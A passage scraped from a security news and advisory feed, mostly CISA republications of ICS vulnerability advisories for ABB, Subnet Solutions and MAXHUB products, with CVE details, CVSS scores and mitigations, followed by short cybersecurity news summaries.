be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Frequently Asked Questions What causes the vulnerability? - Parsing CMS AuthEnvelopedData or EnvelopedData message with maliciously crafted AEAD parameters can trigger a stack buffer overflow. What is AC500 V3? - The AC500 V3 is a scalable range of Programmable Logic Controller (PLC). It provides solutions for small, medium and high-end applications. The AC500 V3 platform offers different performance levels and is the ideal choice for high availability, extreme environments, condition monitoring, motion control or safety solutions. It offers interoperability and compatibility in hardware and software from compact PLCs up to high end and safety PLCs. What might an attacker use the vulnerability to do? - An attacker who successfully exploited these vulnerabilities could cause a crash, denial-of-service (DoS), or potentially remote code execution. How could an attacker exploit the vulnerability? - Refer to section “Vulnerability severity and details“. Could the vulnerability be exploited remotely? - Yes, an attacker who has network access to an affected system node could exploit the vulnerabilities. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. When this security advisory was issued, had this vulnerability been publicly disclosed? - Yes, the vulnerabilities have been publicly disclosed. When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? - No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT 3ADR011536 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-03-12 Date Revision Summary 2026-03-12 1 Initial version. 2026-05-12 2 Initial CISA Republication of ABB PSIRT 3ADR011536 advisory Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of these vulnerabilities could allow an authenticated attacker to expose sensitive information or cause a CRLF injection. The following versions of Subnet Solutions PowerSYSTEM Center are affected: PowerSYSTEM Center 2020 <=5.28.x (CVE-2026-35504) PowerSYSTEM Center 2020 >=5.8.x|<=5.28.x (CVE-2026-26289) PowerSYSTEM Center 2020 >=5.11.x|<=5.28.x (CVE-2026-33570) PowerSYSTEM Center 2024 >=6.0.x|<=6.1.x (CVE-2026-26289, CVE-2026-35555, CVE-2026-35504) PowerSYSTEM Center 2026 7.0.x (CVE-2026-26289, CVE-2026-35555, CVE-2026-35504) CVSS Vendor Equipment Vulnerabilities v3 8.2 Subnet Solutions Inc. Subnet Solutions PowerSYSTEM Center Incorrect Authorization, Improper Neutralization of CRLF Sequences ('CRLF Injection') Background Critical Infrastructure Sectors: Critical Manufacturing, Energy Countries/Areas Deployed: Worldwide Company Headquarters Location: Canada Vulnerabilities Expand All + CVE-2026-26289 PowerSYSTEM Center REST API endpoint for device account export allows an authenticated user with limited permissions to expose sensitive information normally restricted to administrative permissions only. View CVE Details Affected Products Subnet Solutions PowerSYSTEM Center Vendor: Subnet Solutions Inc. Product Version: Subnet Solutions Inc. PowerSYSTEM Center 2020: >=5.8.x|<=5.28.x, Subnet Solutions Inc. PowerSYSTEM Center 2024: >=6.0.x|<=6.1.x, Subnet Solutions Inc. PowerSYSTEM Center 2026: 7.0.x Product Status: known_affected Remediations Mitigation Subnet Solutions recommends users update to the latest version of PowerSYSTEM Center PSC 2020 Update 29, PSC 2024 Update 2, and PSC 2026 GA Hotfix. Mitigation For assistance in upgrading, users should contact a Subnet Solutions System Integration team member or customer support team at (403) 270-8885 or by email at support@subnet.com. mailto:support@subnet.com Mitigation Subnet Solutions recommends users do the following in order to reduce risk: Monitor user activity records to ensure users are following acceptable usage policies of the application. Restrict access to Notification Settings to trusted Administrators Monitor "Send from Address" in settings and Activity Records. Configure a notification rule that triggers in any bulk account export activity. Relevant CWE: CWE-863 Incorrect Authorization Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.2 HIGH CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L CVE-2026-33570 PowerSYSTEM Center REST API endpoint for devices allows a low privilege authenticated user to access information normally limited by operational permissions. View CVE Details Affected Products Subnet Solutions PowerSYSTEM Center Vendor: Subnet Solutions Inc. Product Version: Subnet Solutions Inc. PowerSYSTEM Center 2020: >=5.11.x|<=5.28.x Product Status: known_affected Remediations Mitigation Subnet Solutions recommends users update to the latest version of PowerSYSTEM Center PSC 2020 Update 29, PSC 2024 Update 2, and PSC 2026 GA Hotfix. Mitigation For assistance in upgrading, users should contact a Subnet Solutions System Integration team member or customer support team at (403) 270-8885 or by email at support@subnet.com. mailto:support@subnet.com Mitigation Subnet Solutions recommends users do the following in order to reduce risk: Monitor user activity records to ensure users are following acceptable usage policies of the application. Restrict access to Notification Settings to trusted Administrators Monitor "Send from Address" in settings and Activity Records. Configure a notification rule that triggers in any bulk account export activity. Relevant CWE: CWE-863 Incorrect Authorization Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.7 MEDIUM CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CVE-2026-35555 PowerSYSTEM Center feature for device project groups allows an authenticated user with limited permissions to perform an unauthorized deletion of project groups. View CVE Details Affected Products Subnet Solutions PowerSYSTEM Center Vendor: Subnet Solutions Inc. Product Version: Subnet Solutions Inc. PowerSYSTEM Center 2024: >=6.0.x|<=6.1.x, Subnet Solutions Inc. PowerSYSTEM Center 2026: 7.0.x Product Status: known_affected Remediations Mitigation Subnet Solutions recommends users update to the latest version of PowerSYSTEM Center PSC 2020 Update 29, PSC 2024 Update 2, and PSC 2026 GA Hotfix. Mitigation For assistance in upgrading, users should contact a Subnet Solutions System Integration team member or customer support team at (403) 270-8885 or by email at support@subnet.com. mailto:support@subnet.com Mitigation Subnet Solutions recommends users do the following in order to reduce risk: Monitor user activity records to ensure users are following acceptable usage policies of the application. Restrict access to Notification Settings to trusted Administrators Monitor "Send from Address" in settings and Activity Records. Configure a notification rule that triggers in any bulk account export activity. Relevant CWE: CWE-863 Incorrect Authorization Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.3 MEDIUM CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L CVE-2026-35504 PowerSYSTEM Center email notification service is affected by a CRLF injection vulnerability when using SMTPS communication. View CVE Details Affected Products Subnet Solutions PowerSYSTEM Center Vendor: Subnet Solutions Inc. Product Version: Subnet Solutions Inc. PowerSYSTEM Center 2020: <=5.28.x, Subnet Solutions Inc. PowerSYSTEM Center 2024: >=6.0.x|<=6.1.x, Subnet Solutions Inc. PowerSYSTEM Center 2026: 7.0.x Product Status: known_affected Remediations Mitigation Subnet Solutions recommends users update to the latest version of PowerSYSTEM Center PSC 2020 Update 29, PSC 2024 Update 2, and PSC 2026 GA Hotfix. Mitigation For assistance in upgrading, users should contact a Subnet Solutions System Integration team member or customer support team at (403) 270-8885 or by email at support@subnet.com. mailto:support@subnet.com Mitigation Subnet Solutions recommends users do the following in order to reduce risk: Monitor user activity records to ensure users are following acceptable usage policies of the application. Restrict access to Notification Settings to trusted Administrators Monitor "Send from Address" in settings and Activity Records. Configure a notification rule that triggers in any bulk account export activity. Relevant CWE: CWE-93 Improper Neutralization of CRLF Sequences ('CRLF Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L Acknowledgments Kelly Stich of Subnet Solutions Inc reported these vulnerabilities to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary ABB became aware of severe vulnerability in the products versions listed as affected in the advisory. An update is available that resolves these vulnerabilities. An attacker who successfully exploited these vulnerabilities could bypass the user management and read visualization files (CVE-2025-2595), read and write certificates and keys (CVE-2025-41659) or cause a denial-of-service (DoS) (CVE-2025-41691). The following versions of ABB AC500 V3 Multiple Vulnerabilities are affected: AC500 V3 <3.9.0, 3.9.0  CVSS Vendor Equipment Vulnerabilities v3 8.3 ABB ABB AC500 V3 Multiple Vulnerabilities Direct Request ('Forced Browsing'), Incorrect Permission Assignment for Critical Resource, NULL Pointer Dereference Background Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Water and Wastewater Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-2595 The visualization allows users to create browser-based visualizations for monitoring and controlling industrial processes. Access to these visualizations can be restricted using the built-in user management. However, an unauthenticated remote attacker can bypass the user management and read visualization files by means of forced browsing. The exposed files, accessible via a web browser, contain only static visualization data such as text lists, icons or images, but no live data from the controlled system. View CVE Details Affected Products ABB AC500 V3 Multiple Vulnerabilities Vendor: ABB Product Version: ABB AC500 V3 <3.9.0 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: - AC500 V3 firmware version 3.9.0 ABB recommends that customers apply the update at earliest convenience. This firmware version is released for all AC500 V3 PLC types and available from Automation Builder 2.9.0. Automation Builder 2.9.0 is available for download from the related download site. https://www.abb.com/global/en/areas/motion/digital-tools/automation-builder/software-download Mitigation Refer to section “General security recommendations” for further advise on how to keep your system secure. Workaround No workarounds are available Relevant CWE: CWE-425 Direct Request ('Forced Browsing') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F/RL:O/RC:C CVE-2025-41659 A vulnerability in the runtime system allows low-privileged remote attackers to access the PKI folder via CODESYS protocol, enabling them to read and write certificates and keys. This exposes sensitive cryptographic data and allows unauthorized certificates to be trusted. However, all services remain available, only certificate based encryption and signing features are concerned. The issue affects systems using the optional CmpOpenSSL component for cryptographic operations. View CVE Details Affected Products ABB AC500 V3 Multiple Vulnerabilities Vendor: ABB Product Version: ABB AC500 V3 <3.9.0 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: - AC500 V3 firmware version 3.9.0 ABB recommends that customers apply the update at earliest convenience. This firmware version is released for all AC500 V3 PLC types and available from Automation Builder 2.9.0. Automation Builder 2.9.0 is available for download from the related download site. https://www.abb.com/global/en/areas/motion/digital-tools/automation-builder/software-download Mitigation Refer to section “General security recommendations” for further advise on how to keep your system secure. Workaround No workarounds are available Relevant CWE: CWE-732 Incorrect Permission Assignment for Critical Resource Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.3 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L/E:F/RL:O/RC:C CVE-2025-41691 A vulnerability in the runtime system's CmpDevice component allows unauthenticated attackers to cause a denial-of-service (DoS) via specially crafted communication requests. The issue is triggered by a NULL pointer dereference and also affects systems when outdated clients attempt to log in. View CVE Details Affected Products ABB AC500 V3 Multiple Vulnerabilities Vendor: ABB Product Version: ABB AC500 V3 <3.9.0 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: - AC500 V3 firmware version 3.9.0 ABB recommends that customers apply the update at earliest convenience. This firmware version is released for all AC500 V3 PLC types and available from Automation Builder 2.9.0. Automation Builder 2.9.0 is available for download from the related download site. https://www.abb.com/global/en/areas/motion/digital-tools/automation-builder/software-download Mitigation Refer to section “General security recommendations” for further advise on how to keep your system secure. Workaround No workarounds are available Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C Acknowledgments ABB PSIRT reported these vulnerabilities to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Frequently Asked Questions What causes the vulnerability? - Refer to section “Vulnerability severity and details“. What is AC500 V3? - The AC500 V3 is a scalable range of Programmable Logic Controller (PLC). It provides solutions for small, medium and high-end applications. The AC500 V3 platform offers different performance levels and is the ideal choice for high availability, extreme environments, condition monitoring, motion control or safety solutions. It offers interoperability and compatibility in hardware and software from compact PLCs up to high end and safety PLCs. What might an attacker use the vulnerability to do? - An attacker who successfully exploited these vulnerabilities could bypass the user management and read visualization files (CVE-2025-2595), read and write certificates and keys (CVE-2025-41659) or cause a denial-of-service (DoS) (CVE-2025-41691). How could an attacker exploit the vulnerability? - Refer to section “Vulnerability severity and details“. Could the vulnerability be exploited remotely? - Yes, an attacker who has network access to an affected system node could exploit the vulnerabilities. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. When this security advisory was issued, had this vulnerability been publicly disclosed? - Yes, the vulnerabilities have been publicly disclosed. When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? - No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT 3ADR011524 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-02-24 Date Revision Summary 2026-02-24 1 Initial version. 2026-05-12 2 Initial CISA Republication of ABB PSIRT 3ADR011524 advisory Legal Notice and Terms of Use

Security controls can do only so much. Here are four attacks where your employees are usually your first, and only, line of cyber defense.

The privilege escalation vulnerability, which is similar to other Linux flaws like Copy Fail and Dirty Pipe, may already be under limited exploitation.

Cyber adversaries have long used AI, but now attackers are using large language models to develop exploits and orchestrate complex attacks.

A malicious Hugging Face repository that reached the platform's trending list impersonated OpenAI's "Privacy Filter" project to deliver information-stealing malware to Windows users. [...]

A Manhattan judge modified a restraining notice to let Arbitrum DAO move $71 million in frozen Ether to Aave, while preserving terrorism victims’ legal claim on the funds.

Strike CEO Jack Mallers argued that if Wall Street “kills” Bitcoin, then the asset was never going to succeed in the first place.

The edtech company is struggling to wrest control from its hackers. PII belonging to hundreds of millions of people is on the line.

A report by Poland’s top intelligence agency accused Russia of sabotage and hacking activities against the country’s military and civilian infrastructure.

Former cybersecurity executive Peter Williams stole several surveillance and hacking tools and sold them for $1.3 million to a Russian broker that works with Putin’s government.

NVIDIA has confirmed in a statement for BleepingComputer that GeForce NOW user information has been exposed in a data breach. [...]

Solv Protocol and other DeFi projects are migrating to Chainlink infrastructure after the $293 million exploit exposed risks in third-party bridge and oracle setups.

Attackers move faster than overwhelmed SOC teams can realistically investigate alerts. Prophet Security breaks down how AI can help analysts investigate alerts faster and focus on real threats. [...]

Criminal teams behind wrench attacks usually consist of three to five people, often posing as delivery drivers or luring victims into ambushes, said CertiK.

The attack on the Trellix source code repository disclosed last week has been claimed by the RansomHouse threat group, which leaked a small set of images as proof of the intrusion. [...]

When an agent reads attacker-controlled content and acts on it using its own privileges, the user's name ends up on every audit log entry. From Microsoft Copilot to ConfusedPilot, this post walks through how confused deputy attacks work and the layered controls that help contain them.

CISA has given U.S. federal agencies four days to secure their networks against a high-severity vulnerability in Ivanti Endpoint Manager Mobile (EPMM) exploited in zero-day attacks. [...]

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-42208 BerriAI LiteLLM SQL Injection Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

The credit facility would help Aave address bad debt created after the April rsETH exploit strained its WETH market.

Hackers who gained access to the databases of Spanish fast-fashion retailer Zara stole data belonging to more than 197,000 customers, according to data breach notification service Have I Been Pwned. [...]

A new Linux zero-day exploit, named Dirty Frag, allows local attackers to gain root privileges on most major Linux distributions with a single command. [...]

An ongoing data extortion attack targeting the widely-used education technology platform Canvas disrupted classes and coursework at school districts and universities across the United States today, after a cybercrime group defaced the service's login page with a ransom demand that threatened to leak data from 275 million students and faculty across nearly 9,000 educational institutions.

The ShinyHunters extortion gang has breached education technology giant Instructure again, this time exploiting another vulnerability to deface Canvas login portals for hundreds of colleges and universities. [...]

A new trojan named TCLBanker, which targets 59 banking, fintech, and cryptocurrency platforms, uses a trojanized MSI installer for Logitech AI Prompt Builder to infect systems. [...]

PCPJack makes innovative use of parquet files for stealthy, pre-validated target discovery as it canvasses multiple cloud environments.

A new malware framework called PCPJack is stealing credentials from exposed cloud infrastructure while actively removing TeamPCP's access to the systems. [...]

The Australian Cyber Security Center (ACSC) is warning organizations of an ongoing malware campaign using the ClickFix social engineering technique to distribute  the Vidar Stealer info-stealing malware. [...]

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution.  Mozilla Firefox is a web browser used to access the Internet. Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Ivanti warned customers today to patch a high-severity remote code execution vulnerability in Endpoint Manager Mobile (EPMM) exploited in zero-day attacks. [...]

The most sophisticated AI-integrated campaign to date hit a brick wall in the form of a SCADA login screen.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-6973 Ivanti Endpoint Manager Mobile (EPMM) Improper Input Validation Vulnerability  This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

View CSAF Summary Successful exploitation of this vulnerability may enable an attacker to access tenant email addresses and associated information in cleartext or cause a denial-of-service condition. The following versions of MAXHUB Pivot client application are affected: MAXHUB Pivot client application CVSS Vendor Equipment Vulnerabilities v3 7.3 MAXHUB MAXHUB Pivot client application Use of a Broken or Risky Cryptographic Algorithm Background Critical Infrastructure Sectors: Information Technology Countries/Areas Deployed: Worldwide Company Headquarters Location: United States Vulnerabilities Expand All + CVE-2026-6411 This vulnerability, in the MAXHUB Pivot client application versions prior to v1.36.2, may allow an attacker to obtain encrypted tenant email addresses and related metadata from any tenant. Due to the presence of a hardcoded AES key within the application, the encrypted data can be decrypted, enabling access to tenant email addresses and associated information in cleartext. Furthermore, an attacker may be able to cause a denial-of-service condition by enrolling multiple unauthorized devices into a tenant via MQTT, potentially disrupting tenant operations. View CVE Details Affected Products MAXHUB Pivot client application Vendor: MAXHUB Product Version: MAXHUB MAXHUB Pivot client application: <v1.36.2 Product Status: known_affected Remediations Mitigation MAXHUB recommends users upgrade the Pivot client application to v1.36.2 or newer. The remediation has been made available through an OTA update. Users running v1.36.2 or later are not affected and need only ensure they continue to maintain the latest version. At this time, MAXHUB is not aware of any public exploitation of this issue. For more information, see the MAXHUB support page. https://www.maxhub.com/en/support/ Relevant CWE: CWE-327 Use of a Broken or Risky Cryptographic Algorithm Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L Acknowledgments Malik MAKKES and Yassine BENGANA of Abicom Groupe OCI reported this vulnerability to MAXHUB Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as virtual private networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. Revision History Initial Release Date: 2026-05-07 Date Revision Summary 2026-05-07 1 Initial Publication Legal Notice and Terms of Use

A vulnerability has been discovered in the PAN-OS Authentication Portal (aka Captive Portal) service that could allow for remote code execution. PAN-OS is the operating system that runs Palo Alto Networks next-generation firewalls. Successful exploitation could allow an unauthenticated remote attacker to execute arbitrary code with root privileges on the PA-Series and VM-Series firewalls by sending specially crafted packets.

Authors of the VoidStealer Trojan uncovered yet another way to get around Google's App-Bound Encryption (ABE), opening the door to infostealers.

ShinyHunters' attack on Instructure, which owns the widely used Canvas learning management system (LMS), carries big questions about the trust educational institutions put into their vendors.

A vulnerability has been discovered in Apache HTTP Server with the HTTP/2 protocol that could allow for remote code execution. Apache is a free, open-source web server software that enables the delivery of web content over the internet. Successful exploitation could result in denial of service, crashing worker processes with minimal effort. In certain setups, especially those using APR with mmap (common on Debian systems and official Docker images), it may also be exploited for remote code execution.

Bishop Fox researchers confirmed a critical pre-authentication SQL injection in LiteLLM proxy affecting versions 1.81.16 through 1.83.6. Attackers can exploit it without credentials, and it blends into normal logs. In-the-wild exploitation was observed within 36 hours of the advisory going public.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.  CVE-2026-0300 Palo Alto Networks PAN-OS Out-of-bounds Write Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.  Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

In hard-to-detect attacks, hackers are dropping the CloudZ RAT and a fresh plug-in, Pheno, to hijack the Windows-based bridge between PCs and smartphones.

As the war with Iran continues, breach attempts targeting the United Arab Emirates tripled in a few weeks — many targeting critical infrastructure.

Info is scant, but such breaches can reveal where a security product's controls are located and how detections are designed, giving attackers a leg up.

The UC Berkeley Center for Long-Term Cybersecurity (CLTC) offers tools and support to schools, local governments, and non-profits as they defend themselves against a growing volume of cyberattacks.

A 23-year-old university student in Taiwan was arrested for interfering with the TETRA communication system used by the country's high-speed railway network (THSR). [...]

The cybersecurity company says it's seen thousands of infection attempts, and at least a dozen successful hacks after users installed malicious versions of the popular Windows software.

A proof-of-concept exploit (PoC) shows how someone with admin privileges can exploit the issue to steal passwords, and thus use them to engage in further malicious activity.

The data breach at education tech giant Instructure includes students' private data, according to a sample of the allegedly stolen data seen by TechCrunch.

The ShinyHunters extortion gang stole personal information belonging to over 119,000 people after hacking the Vimeo online video platform in April, according to data breach notification service Have I Been Pwned. [...]

View CSAF Summary ABB became aware of vulnerability in the product versions listed as affected in the advisory. An update is available that resolves a vulnerability. An attacker who successfully exploited this vulnerability could cause the product to stop. The following versions of ABB B&R Automation Runtime are affected: Automation Runtime <6.5, >=6.5, =R4.93 (CVE-2025-11044, CVE-2025-11044) CVSS Vendor Equipment Vulnerabilities v3 6.8 ABB ABB B&R Automation Runtime Allocation of Resources Without Limits or Throttling Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-11044 An Allocation of Resources Without Limits or Throttling vulnerability in the ANSL-Server component of B&R Automation Runtime versions prior to 6.5 and prior to R4.93 could be exploited by an unauthenticated attacker on the net-work to win a race condition, resulting in permanent denial-of-service (DoS) conditions on affected devices. View CVE Details Affected Products ABB B&R Automation Runtime Vendor: ABB Product Version: ABB Automation Runtime <6.5, ABB Automation Runtime <R4.93 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: - Automation Runtime 6 versions >= 6.5 - Automation Runtime 4 versions >= R4.93 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation The vulnerability cannot be 